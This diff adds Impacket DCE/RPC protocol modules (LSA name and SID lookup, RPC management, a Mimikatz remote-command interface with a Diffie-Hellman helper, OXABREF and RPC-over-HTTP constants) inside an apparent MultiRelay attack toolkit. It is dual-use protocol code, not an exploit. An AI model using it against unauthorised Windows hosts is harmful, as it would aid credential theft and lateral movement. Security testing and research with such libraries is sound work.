+       ('UserName', PRPC_UNICODE_STRING),
+       ('DomainName', PRPC_UNICODE_STRING),
+    )
+
+class LsarGetUserNameResponse(NDRCALL):
+    structure = (
+       ('UserName', PRPC_UNICODE_STRING),
+       ('DomainName', PRPC_UNICODE_STRING),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.5 LsarLookupNames4 (Opnum 77)
+class LsarLookupNames4(NDRCALL):
+    opnum = 77
+    structure = (
+       ('Count', ULONG),
+       ('Names', RPC_UNICODE_STRING_ARRAY),
+       ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX2),
+       ('LookupLevel', LSAP_LOOKUP_LEVEL),
+       ('MappedCount', ULONG),
+       ('LookupOptions', ULONG),
+       ('ClientRevision', ULONG),
+    )
+
+class LsarLookupNames4Response(NDRCALL):
+    structure = (
+       ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST),
+       ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX2),
+       ('MappedCount', ULONG),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.6 LsarLookupNames3 (Opnum 68)
+class LsarLookupNames3(NDRCALL):
+    opnum = 68
+    structure = (
+       ('PolicyHandle', LSAPR_HANDLE),
+       ('Count', ULONG),
+       ('Names', RPC_UNICODE_STRING_ARRAY),
+       ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX2),
+       ('LookupLevel', LSAP_LOOKUP_LEVEL),
+       ('MappedCount', ULONG),
+       ('LookupOptions', ULONG),
+       ('ClientRevision', ULONG),
+    )
+
+class LsarLookupNames3Response(NDRCALL):
+    structure = (
+       ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST),
+       ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX2),
+       ('MappedCount', ULONG),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.7 LsarLookupNames2 (Opnum 58)
+class LsarLookupNames2(NDRCALL):
+    opnum = 58
+    structure = (
+       ('PolicyHandle', LSAPR_HANDLE),
+       ('Count', ULONG),
+       ('Names', RPC_UNICODE_STRING_ARRAY),
+       ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX),
+       ('LookupLevel', LSAP_LOOKUP_LEVEL),
+       ('MappedCount', ULONG),
+       ('LookupOptions', ULONG),
+       ('ClientRevision', ULONG),
+    )
+
+class LsarLookupNames2Response(NDRCALL):
+    structure = (
+       ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST),
+       ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX),
+       ('MappedCount', ULONG),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.8 LsarLookupNames (Opnum 14)
+class LsarLookupNames(NDRCALL):
+    opnum = 14
+    structure = (
+       ('PolicyHandle', LSAPR_HANDLE),
+       ('Count', ULONG),
+       ('Names', RPC_UNICODE_STRING_ARRAY),
+       ('TranslatedSids', LSAPR_TRANSLATED_SIDS),
+       ('LookupLevel', LSAP_LOOKUP_LEVEL),
+       ('MappedCount', ULONG),
+    )
+
+class LsarLookupNamesResponse(NDRCALL):
+    structure = (
+       ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST),
+       ('TranslatedSids', LSAPR_TRANSLATED_SIDS),
+       ('MappedCount', ULONG),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.9 LsarLookupSids3 (Opnum 76)
+class LsarLookupSids3(NDRCALL):
+    opnum = 76
+    structure = (
+       ('SidEnumBuffer', LSAPR_SID_ENUM_BUFFER),
+       ('TranslatedNames', LSAPR_TRANSLATED_NAMES_EX),
+       ('LookupLevel', LSAP_LOOKUP_LEVEL),
+       ('MappedCount', ULONG),
+       ('LookupOptions', ULONG),
+       ('ClientRevision', ULONG),
+    )
+
+class LsarLookupSids3Response(NDRCALL):
+    structure = (
+       ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST),
+       ('TranslatedNames', LSAPR_TRANSLATED_NAMES_EX),
+       ('MappedCount', ULONG),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.10 LsarLookupSids2 (Opnum 57)
+class LsarLookupSids2(NDRCALL):
+    opnum = 57
+    structure = (
+       ('PolicyHandle', LSAPR_HANDLE),
+       ('SidEnumBuffer', LSAPR_SID_ENUM_BUFFER),
+       ('TranslatedNames', LSAPR_TRANSLATED_NAMES_EX),
+       ('LookupLevel', LSAP_LOOKUP_LEVEL),
+       ('MappedCount', ULONG),
+       ('LookupOptions', ULONG),
+       ('ClientRevision', ULONG),
+    )
+
+class LsarLookupSids2Response(NDRCALL):
+    structure = (
+       ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST),
+       ('TranslatedNames', LSAPR_TRANSLATED_NAMES_EX),
+       ('MappedCount', ULONG),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.11 LsarLookupSids (Opnum 15)
+class LsarLookupSids(NDRCALL):
+    opnum = 15
+    structure = (
+       ('PolicyHandle', LSAPR_HANDLE),
+       ('SidEnumBuffer', LSAPR_SID_ENUM_BUFFER),
+       ('TranslatedNames', LSAPR_TRANSLATED_NAMES),
+       ('LookupLevel', LSAP_LOOKUP_LEVEL),
+       ('MappedCount', ULONG),
+    )
+
+class LsarLookupSidsResponse(NDRCALL):
+    structure = (
+       ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST),
+       ('TranslatedNames', LSAPR_TRANSLATED_NAMES),
+       ('MappedCount', ULONG),
+       ('ErrorCode', NTSTATUS),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+ 14 : (LsarLookupNames, LsarLookupNamesResponse),
+ 15 : (LsarLookupSids, LsarLookupSidsResponse),
+ 45 : (LsarGetUserName, LsarGetUserNameResponse),
+ 57 : (LsarLookupSids2, LsarLookupSids2Response),
+ 58 : (LsarLookupNames2, LsarLookupNames2Response),
+ 68 : (LsarLookupNames3, LsarLookupNames3Response),
+ 76 : (LsarLookupSids3, LsarLookupSids3Response),
+ 77 : (LsarLookupNames4, LsarLookupNames4Response),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def hLsarGetUserName(dce, userName = NULL, domainName = NULL):
+    request = LsarGetUserName()
+    request['SystemName'] = NULL
+    request['UserName'] = userName
+    request['DomainName'] = domainName
+    return dce.request(request)
+
+def hLsarLookupNames4(dce, names, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta, lookupOptions=0x00000000, clientRevision=0x00000001):
+    request = LsarLookupNames4()
+    request['Count'] = len(names)
+    for name in names:
+        itemn = RPC_UNICODE_STRING()
+        itemn['Data'] = name
+        request['Names'].append(itemn)
+    request['TranslatedSids']['Sids'] = NULL
+    request['LookupLevel'] = lookupLevel
+    request['LookupOptions'] = lookupOptions
+    request['ClientRevision'] = clientRevision
+
+    return dce.request(request)
+
+def hLsarLookupNames3(dce, policyHandle, names, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta, lookupOptions=0x00000000, clientRevision=0x00000001):
+    request = LsarLookupNames3()
+    request['PolicyHandle'] = policyHandle
+    request['Count'] = len(names)
+    for name in names:
+        itemn = RPC_UNICODE_STRING()
+        itemn['Data'] = name
+        request['Names'].append(itemn)
+    request['TranslatedSids']['Sids'] = NULL
+    request['LookupLevel'] = lookupLevel
+    request['LookupOptions'] = lookupOptions
+    request['ClientRevision'] = clientRevision
+
+    return dce.request(request)
+
+def hLsarLookupNames2(dce, policyHandle, names, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta, lookupOptions=0x00000000, clientRevision=0x00000001):
+    request = LsarLookupNames2()
+    request['PolicyHandle'] = policyHandle
+    request['Count'] = len(names)
+    for name in names:
+        itemn = RPC_UNICODE_STRING()
+        itemn['Data'] = name
+        request['Names'].append(itemn)
+    request['TranslatedSids']['Sids'] = NULL
+    request['LookupLevel'] = lookupLevel
+    request['LookupOptions'] = lookupOptions
+    request['ClientRevision'] = clientRevision
+
+    return dce.request(request)
+
+def hLsarLookupNames(dce, policyHandle, names, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta):
+    request = LsarLookupNames()
+    request['PolicyHandle'] = policyHandle
+    request['Count'] = len(names)
+    for name in names:
+        itemn = RPC_UNICODE_STRING()
+        itemn['Data'] = name
+        request['Names'].append(itemn)
+    request['TranslatedSids']['Sids'] = NULL
+    request['LookupLevel'] = lookupLevel
+
+    return dce.request(request)
+
+def hLsarLookupSids2(dce, policyHandle, sids, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta, lookupOptions=0x00000000, clientRevision=0x00000001):
+    request = LsarLookupSids2()
+    request['PolicyHandle'] = policyHandle
+    request['SidEnumBuffer']['Entries'] = len(sids)
+    for sid in sids:
+        itemn = LSAPR_SID_INFORMATION()
+        itemn['Sid'].fromCanonical(sid)
+        request['SidEnumBuffer']['SidInfo'].append(itemn)
+
+    request['TranslatedNames']['Names'] = NULL
+    request['LookupLevel'] = lookupLevel
+    request['LookupOptions'] = lookupOptions
+    request['ClientRevision'] = clientRevision
+
+    return dce.request(request)
+
+def hLsarLookupSids(dce, policyHandle, sids, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta):
+    request = LsarLookupSids()
+    request['PolicyHandle'] = policyHandle
+    request['SidEnumBuffer']['Entries'] = len(sids)
+    for sid in sids:
+        itemn = LSAPR_SID_INFORMATION()
+        itemn['Sid'].fromCanonical(sid)
+        request['SidEnumBuffer']['SidInfo'].append(itemn)
+
+    request['TranslatedNames']['Names'] = NULL
+    request['LookupLevel'] = lookupLevel
+
+    return dce.request(request)

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/mgmt.py

@@ -0,0 +1,166 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   [C706] Remote Management Interface implementation
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Some calls have helper functions, which makes it even easier to use.
+#   They are located at the end of this file. 
+#   Helper functions start with "h"<name of the call>.
+#   There are test cases for them too. 
+#
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantArray, NDRUniConformantVaryingArray
+from impacket.dcerpc.v5.epm import PRPC_IF_ID
+from impacket.dcerpc.v5.dtypes import ULONG, DWORD_ARRAY, ULONGLONG
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.uuid import uuidtup_to_bin
+from impacket import nt_errors
+
+MSRPC_UUID_MGMT  = uuidtup_to_bin(('afa8bd80-7d8a-11c9-bef4-08002b102989','1.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in nt_errors.ERROR_MESSAGES:
+            error_msg_short = nt_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = nt_errors.ERROR_MESSAGES[key][1] 
+            return 'MGMT SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'MGMT SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+
+class rpc_if_id_p_t_array(NDRUniConformantArray):
+    item = PRPC_IF_ID
+
+class rpc_if_id_vector_t(NDRSTRUCT):
+    structure = (
+        ('count',ULONG),
+        ('if_id',rpc_if_id_p_t_array),
+    )
+    structure64 = (
+        ('count',ULONGLONG),
+        ('if_id',rpc_if_id_p_t_array),
+    )
+
+class rpc_if_id_vector_p_t(NDRPOINTER):
+    referent = (
+        ('Data', rpc_if_id_vector_t),
+    )
+
+error_status = ULONG
+################################################################################
+# STRUCTURES
+################################################################################
+
+################################################################################
+# RPC CALLS
+################################################################################
+class inq_if_ids(NDRCALL):
+    opnum = 0
+    structure = (
+    )
+
+class inq_if_idsResponse(NDRCALL):
+    structure = (
+       ('if_id_vector', rpc_if_id_vector_p_t),
+       ('status', error_status),
+    )
+
+class inq_stats(NDRCALL):
+    opnum = 1
+    structure = (
+       ('count', ULONG),
+    )
+
+class inq_statsResponse(NDRCALL):
+    structure = (
+       ('count', ULONG),
+       ('statistics', DWORD_ARRAY),
+       ('status', error_status),
+    )
+
+class is_server_listening(NDRCALL):
+    opnum = 2
+    structure = (
+    )
+
+class is_server_listeningResponse(NDRCALL):
+    structure = (
+       ('status', error_status),
+    )
+
+class stop_server_listening(NDRCALL):
+    opnum = 3
+    structure = (
+    )
+
+class stop_server_listeningResponse(NDRCALL):
+    structure = (
+       ('status', error_status),
+    )
+
+class inq_princ_name(NDRCALL):
+    opnum = 4
+    structure = (
+       ('authn_proto', ULONG),
+       ('princ_name_size', ULONG),
+    )
+
+class inq_princ_nameResponse(NDRCALL):
+    structure = (
+       ('princ_name', NDRUniConformantVaryingArray),
+       ('status', error_status),
+    )
+
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+ 0 : (inq_if_ids, inq_if_idsResponse),
+ 1 : (inq_stats, inq_statsResponse),
+ 2 : (is_server_listening, is_server_listeningResponse),
+ 3 : (stop_server_listening, stop_server_listeningResponse),
+ 4 : (inq_princ_name, inq_princ_nameResponse),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def hinq_if_ids(dce):
+    request = inq_if_ids()
+    return dce.request(request)
+
+def hinq_stats(dce, count = 4):
+    request = inq_stats()
+    request['count'] = count
+    return dce.request(request)
+
+def his_server_listening(dce):
+    request = is_server_listening()
+    return dce.request(request, checkError=False)
+
+def hstop_server_listening(dce):
+    request = stop_server_listening()
+    return dce.request(request)
+
+def hinq_princ_name(dce, authn_proto=0, princ_name_size=1):
+    request = inq_princ_name()
+    request['authn_proto'] = authn_proto
+    request['princ_name_size'] = princ_name_size
+    return dce.request(request, checkError=False)

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/mimilib.py

@@ -0,0 +1,236 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   Mimikatz Interface implementation, based on @gentilkiwi IDL
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Some calls have helper functions, which makes it even easier to use.
+#   They are located at the end of this file. 
+#   Helper functions start with "h"<name of the call>.
+#   There are test cases for them too. 
+#
+from __future__ import division
+from __future__ import print_function
+import binascii
+import random
+
+from impacket import nt_errors
+from impacket.dcerpc.v5.dtypes import DWORD, ULONG
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantArray
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.uuid import uuidtup_to_bin
+from impacket.structure import Structure
+
+MSRPC_UUID_MIMIKATZ   = uuidtup_to_bin(('17FC11E9-C258-4B8D-8D07-2F4125156244', '1.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in nt_errors.ERROR_MESSAGES:
+            error_msg_short = nt_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = nt_errors.ERROR_MESSAGES[key][1] 
+            return 'Mimikatz SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'Mimikatz SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+CALG_DH_EPHEM = 0x0000aa02
+TPUBLICKEYBLOB = 0x6
+CUR_BLOB_VERSION = 0x2
+ALG_ID = DWORD
+CALG_RC4 = 0x6801
+
+################################################################################
+# STRUCTURES
+################################################################################
+class PUBLICKEYSTRUC(Structure):
+    structure = (
+        ('bType','B=0'),
+        ('bVersion','B=0'),
+        ('reserved','<H=0'),
+        ('aiKeyAlg','<L=0'),
+    )
+    def __init__(self, data = None, alignment = 0):
+        Structure.__init__(self,data,alignment)
+        self['bType'] = TPUBLICKEYBLOB
+        self['bVersion'] = CUR_BLOB_VERSION
+        self['aiKeyAlg'] = CALG_DH_EPHEM
+
+class DHPUBKEY(Structure):
+    structure = (
+        ('magic','<L=0'),
+        ('bitlen','<L=0'),
+    )
+    def __init__(self, data = None, alignment = 0):
+        Structure.__init__(self,data,alignment)
+        self['magic'] = 0x31484400
+        self['bitlen'] = 1024
+
+class PUBLICKEYBLOB(Structure):
+    structure = (
+        ('publickeystruc',':', PUBLICKEYSTRUC),
+        ('dhpubkey',':', DHPUBKEY),
+        ('yLen', '_-y','128'),
+        ('y',':'),
+    )
+    def __init__(self, data = None, alignment = 0):
+        Structure.__init__(self,data,alignment)
+        self['publickeystruc'] = PUBLICKEYSTRUC().getData()
+        self['dhpubkey'] = DHPUBKEY().getData()
+
+class MIMI_HANDLE(NDRSTRUCT):
+    structure =  (
+        ('Data','20s=""'),
+    )
+    def getAlignment(self):
+        if self._isNDR64 is True:
+            return 8
+        else:
+            return 4
+
+class BYTE_ARRAY(NDRUniConformantArray):
+    item = 'c'
+
+class PBYTE_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data',BYTE_ARRAY),
+    )
+
+class MIMI_PUBLICKEY(NDRSTRUCT):
+    structure =  (
+        ('sessionType',ALG_ID),
+        ('cbPublicKey',DWORD),
+        ('pbPublicKey',PBYTE_ARRAY),
+    )
+
+class PMIMI_PUBLICKEY(NDRPOINTER):
+    referent = (
+        ('Data',MIMI_PUBLICKEY),
+    )
+
+################################################################################
+# RPC CALLS
+################################################################################
+class MimiBind(NDRCALL):
+    opnum = 0
+    structure = (
+       ('clientPublicKey',MIMI_PUBLICKEY),
+    )
+
+class MimiBindResponse(NDRCALL):
+    structure = (
+       ('serverPublicKey',MIMI_PUBLICKEY),
+       ('phMimi',MIMI_HANDLE),
+       ('ErrorCode',ULONG),
+    )
+
+class MimiUnbind(NDRCALL):
+    opnum = 1
+    structure = (
+       ('phMimi',MIMI_HANDLE),
+    )
+
+class MimiUnbindResponse(NDRCALL):
+    structure = (
+       ('phMimi',MIMI_HANDLE),
+       ('ErrorCode',ULONG),
+    )
+
+class MimiCommand(NDRCALL):
+    opnum = 2
+    structure = (
+        ('phMimi',MIMI_HANDLE),
+        ('szEncCommand',DWORD),
+        ('encCommand',PBYTE_ARRAY),
+    )
+
+class MimiCommandResponse(NDRCALL):
+    structure = (
+       ('szEncResult',DWORD),
+       ('encResult',PBYTE_ARRAY),
+       ('ErrorCode',ULONG),
+    )
+
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+ 0 : (MimiBind, MimiBindResponse),
+ 1 : (MimiUnbind, MimiUnbindResponse),
+ 2 : (MimiCommand, MimiCommandResponse),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+
+class MimiDiffeH:
+    def __init__(self):
+        self.G = 2
+        self.P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
+        self.privateKey = random.getrandbits(1024)
+        #self.privateKey = int('A'*128, base=16)
+
+    def genPublicKey(self):
+        self.publicKey = pow(self.G, self.privateKey, self.P)
+        tmp = hex(self.publicKey)[2:].rstrip('L')
+        if len(tmp) & 1:
+            tmp = '0' + tmp
+        return binascii.unhexlify(tmp)
+
+    def getSharedSecret(self, serverPublicKey):
+        pubKey = int(binascii.hexlify(serverPublicKey), base=16)
+        self.sharedSecret = pow(pubKey, self.privateKey, self.P)
+        tmp = hex(self.sharedSecret)[2:].rstrip('L')
+        if len(tmp) & 1:
+            tmp = '0' + tmp
+        return binascii.unhexlify(tmp)
+
+
+def hMimiBind(dce, clientPublicKey):
+    request = MimiBind()
+    request['clientPublicKey'] = clientPublicKey
+    return dce.request(request)
+
+def hMimiCommand(dce, phMimi, encCommand):
+    request = MimiCommand()
+    request['phMimi'] = phMimi
+    request['szEncCommand'] = len(encCommand)
+    request['encCommand'] = list(encCommand)
+    return dce.request(request)
+
+if __name__ == '__main__':
+    from impacket.winregistry import hexdump
+    alice = MimiDiffeH()
+    alice.G = 5
+    alice.P = 23
+    alice.privateKey = 6
+
+    bob = MimiDiffeH()
+    bob.G = 5
+    bob.P = 23
+    bob.privateKey = 15
+
+    print('Alice pubKey')
+    hexdump(alice.genPublicKey())
+    print('Bob pubKey')
+    hexdump(bob.genPublicKey())
+
+    print('Secret')
+    hexdump(alice.getSharedSecret(bob.genPublicKey()))
+    hexdump(bob.getSharedSecret(alice.genPublicKey()))

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/oxabref.py

@@ -0,0 +1,131 @@
+# SECUREAUTH LABS. Copyright 2020 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Description:
+#   [MS-OXABREF]: Address Book Name Service Provider Interface (NSPI) Referral Protocol
+#
+# Authors:
+#  Arseniy Sharoglazov <mohemiv@gmail.com> / Positive Technologies (https://www.ptsecurity.com/)
+#
+
+from impacket import hresult_errors, mapi_constants
+from impacket.dcerpc.v5.dtypes import NULL, STR, ULONG
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRPOINTER
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.uuid import uuidtup_to_bin
+
+MSRPC_UUID_OXABREF = uuidtup_to_bin(('1544F5E0-613C-11D1-93DF-00C04FD7BD09','1.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in mapi_constants.ERROR_MESSAGES:
+            error_msg_short = mapi_constants.ERROR_MESSAGES[key]
+            return 'OXABREF SessionError: code: 0x%x - %s' % (self.error_code, error_msg_short)
+        elif key in hresult_errors.ERROR_MESSAGES:
+            error_msg_short = hresult_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = hresult_errors.ERROR_MESSAGES[key][1]
+            return 'OXABREF SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'OXABREF SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# STRUCTURES
+################################################################################
+class PUCHAR_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', STR),
+    )
+
+class PPUCHAR_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', PUCHAR_ARRAY),
+    )
+
+################################################################################
+# RPC CALLS
+################################################################################
+
+# 3.1.4.1 RfrGetNewDSA (opnum 0)
+class RfrGetNewDSA(NDRCALL):
+    opnum = 0
+    structure = (
+       ('ulFlags', ULONG),
+       ('pUserDN', STR),
+       ('ppszUnused', PPUCHAR_ARRAY),
+       ('ppszServer', PPUCHAR_ARRAY),
+    )
+
+class RfrGetNewDSAResponse(NDRCALL):
+    structure = (
+       ('ppszUnused', PPUCHAR_ARRAY),
+       ('ppszServer', PPUCHAR_ARRAY),
+    )
+
+# 3.1.4.2 RfrGetFQDNFromServerDN (opnum 1)
+class RfrGetFQDNFromServerDN(NDRCALL):
+    opnum = 1
+    structure = (
+       ('ulFlags', ULONG),
+       ('cbMailboxServerDN', ULONG),
+       ('szMailboxServerDN', STR),
+    )
+
+class RfrGetFQDNFromServerDNResponse(NDRCALL):
+    structure = (
+       ('ppszServerFQDN', PUCHAR_ARRAY),
+       ('ErrorCode', ULONG),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+    0   : (RfrGetNewDSA, RfrGetNewDSAResponse),
+    1   : (RfrGetFQDNFromServerDN, RfrGetFQDNFromServerDNResponse),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def checkNullString(string):
+    if string == NULL:
+        return string
+
+    if string[-1:] != '\x00':
+        return string + '\x00'
+    else:
+        return string
+
+def hRfrGetNewDSA(dce, pUserDN=''):
+    request = RfrGetNewDSA()
+    request['ulFlags'] = 0
+    request['pUserDN'] = checkNullString(pUserDN)
+    request['ppszUnused'] = NULL
+    request['ppszServer'] = '\x00'
+
+    resp = dce.request(request)
+    resp['ppszServer'] = resp['ppszServer'][:-1]
+
+    if request['ppszUnused'] != NULL:
+        resp['ppszUnused'] = resp['ppszUnused'][:-1]
+
+    return resp
+
+def hRfrGetFQDNFromServerDN(dce, szMailboxServerDN):
+    szMailboxServerDN = checkNullString(szMailboxServerDN)
+    request = RfrGetFQDNFromServerDN()
+    request['ulFlags'] = 0
+    request['szMailboxServerDN'] = szMailboxServerDN
+    request['cbMailboxServerDN'] = len(szMailboxServerDN)
+
+    resp = dce.request(request)
+    resp['ppszServerFQDN'] = resp['ppszServerFQDN'][:-1]
+
+    return resp

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/rpch.py

@@ -0,0 +1,846 @@
+# SECUREAUTH LABS. Copyright 2020 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Description:
+#   Initial [MS-RCPH] Interface implementation
+#
+# Authors:
+#  Arseniy Sharoglazov <mohemiv@gmail.com> / Positive Technologies (https://www.ptsecurity.com/)
+#
+
+import re
+import binascii
+from struct import unpack
+
+from impacket import uuid, ntlm, system_errors, nt_errors, LOG
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+
+from impacket.uuid import EMPTY_UUID
+from impacket.http import HTTPClientSecurityProvider, AUTH_BASIC
+from impacket.structure import Structure
+from impacket.dcerpc.v5.rpcrt import MSRPCHeader, \
+    MSRPC_RTS, PFC_FIRST_FRAG, PFC_LAST_FRAG
+
+class RPCProxyClientException(DCERPCException):
+    parser = re.compile(r'RPC Error: ([a-fA-F0-9]{1,8})')
+
+    def __init__(self, error_string=None, proxy_error=None):
+        rpc_error_code = None
+
+        if proxy_error is not None:
+            try:
+                search = self.parser.search(proxy_error)
+                rpc_error_code = int(search.group(1), 16)
+            except:
+                error_string += ': ' + proxy_error
+
+        DCERPCException.__init__(self, error_string, rpc_error_code)
+
+    def __str__(self):
+        if self.error_code is not None:
+            key = self.error_code
+            if key in system_errors.ERROR_MESSAGES:
+                error_msg_short = system_errors.ERROR_MESSAGES[key][0]
+                return '%s, code: 0x%x - %s' % (self.error_string, self.error_code, error_msg_short)
+            elif key in nt_errors.ERROR_MESSAGES:
+                error_msg_short = nt_errors.ERROR_MESSAGES[key][0]
+                return '%s, code: 0x%x - %s' % (self.error_string, self.error_code, error_msg_short)
+            else:
+                return '%s: unknown code: 0x%x' % (self.error_string, self.error_code)
+        else:
+            return self.error_string
+
+################################################################################
+# CONSTANTS
+################################################################################
+
+RPC_OVER_HTTP_v1 = 1
+RPC_OVER_HTTP_v2 = 2
+
+# Errors which might need handling
+
+# RPCProxyClient internal errors
+RPC_PROXY_REMOTE_NAME_NEEDED_ERR = 'Basic authentication in RPC proxy is used, ' \
+                                   'so coudn\'t obtain a target NetBIOS name from NTLMSSP to connect.'
+
+# Errors below contain a part of server responses
+RPC_PROXY_INVALID_RPC_PORT_ERR = 'Invalid RPC Port'
+RPC_PROXY_CONN_A1_0X6BA_ERR    = 'RPC Proxy CONN/A1 request failed, code: 0x6ba'
+RPC_PROXY_CONN_A1_404_ERR      = 'CONN/A1 request failed: HTTP/1.1 404 Not Found'
+RPC_PROXY_RPC_OUT_DATA_404_ERR = 'RPC_OUT_DATA channel: HTTP/1.1 404 Not Found'
+RPC_PROXY_CONN_A1_401_ERR      = 'CONN/A1 request failed: HTTP/1.1 401 Unauthorized'
+RPC_PROXY_HTTP_IN_DATA_401_ERR = 'RPC_IN_DATA channel: HTTP/1.1 401 Unauthorized'
+
+
+# 2.2.3.3 Forward Destinations
+FDClient   = 0x00000000
+FDInProxy  = 0x00000001
+FDServer   = 0x00000002
+FDOutProxy = 0x00000003
+
+RTS_FLAG_NONE            = 0x0000
+RTS_FLAG_PING            = 0x0001
+RTS_FLAG_OTHER_CMD       = 0x0002
+RTS_FLAG_RECYCLE_CHANNEL = 0x0004
+RTS_FLAG_IN_CHANNEL      = 0x0008
+RTS_FLAG_OUT_CHANNEL     = 0x0010
+RTS_FLAG_EOF             = 0x0020
+RTS_FLAG_ECHO            = 0x0040
+
+# 2.2.3.5 RTS Commands
+RTS_CMD_RECEIVE_WINDOW_SIZE      = 0x00000000
+RTS_CMD_FLOW_CONTROL_ACK         = 0x00000001
+RTS_CMD_CONNECTION_TIMEOUT       = 0x00000002
+RTS_CMD_COOKIE                   = 0x00000003
+RTS_CMD_CHANNEL_LIFETIME         = 0x00000004
+RTS_CMD_CLIENT_KEEPALIVE         = 0x00000005
+RTS_CMD_VERSION                  = 0x00000006
+RTS_CMD_EMPTY                    = 0x00000007
+RTS_CMD_PADDING                  = 0x00000008
+RTS_CMD_NEGATIVE_ANCE            = 0x00000009
+RTS_CMD_ANCE                     = 0x0000000A
+RTS_CMD_CLIENT_ADDRESS           = 0x0000000B
